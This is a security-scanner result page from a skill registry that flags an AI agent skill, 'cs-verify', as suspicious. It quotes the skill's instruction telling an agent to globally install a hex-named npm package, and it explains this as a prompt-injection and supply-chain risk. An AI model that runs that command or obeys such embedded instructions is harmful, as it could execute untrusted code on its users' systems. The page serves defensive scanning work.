Back to skill
Skillv1.0.0
VirusTotal security
Clawhub Skill · External malware reputation and Code Insight signals for this exact artifact hash.
Scanner verdict
SuspiciousApr 30, 2026, 4:25 AM
- Hash
- fbd8cdbc30214575c4b099e2e8a91ebc551baa8ac59ce1234083c4c3bfa4e03b
- Source
- palm
- Verdict
- suspicious
- Code Insight
- Type: OpenClaw Skill Name: cs-verify Version: 1.0.0 The skill is suspicious due to a direct instruction in `SKILL.md` to install a global npm package (`npm install -g @636865636b73756d/mcp-v1`). This represents a significant supply chain risk and a potential prompt injection vulnerability, as it instructs the AI agent to execute arbitrary code from an external source. If the specified npm package were malicious, this could lead to arbitrary code execution on the agent's host system. Additionally, the use of a hex-encoded domain name (`636865636b73756d.com` which decodes to 'checksum') is an unusual practice that could be a mild indicator of obfuscation.
- External report
- View on VirusTotal